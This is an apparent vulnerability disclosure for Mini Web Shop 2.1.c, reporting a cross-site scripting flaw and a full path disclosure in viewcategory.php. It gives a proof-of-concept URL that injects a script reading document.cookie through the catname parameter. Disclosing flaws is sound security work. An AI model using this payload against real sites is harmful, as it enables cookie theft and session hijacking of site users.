Mini Web Shop version 2.1.c suffers from a cross site scripting flaw.
970873219107890b1946642cf65764cbf57ed2a3ecf4f22de9e3d32e36d4e031
Hello
Vulnerable : MINI WEB SHOP
Version: 2.1.c
web : http://ObieWebsite.SourceForge.net
I Found some bugs ( XSS & Full Path Disclosure ) in MINI WEB SHOP
XSS :
http://example.com/miniwebshop/modules/viewcategory.php?catname='><script>alert(document.cookie)</script>
Full Path Disclosure :
http://example.com/miniwebshop/modules/viewcategory.php?catname=[anything]
Discovery by Linux_Drox ( Qptan )
Linux_Drox@Saudi.Net.Sa
www.LeZr.Com/vb
Best Regards ,,,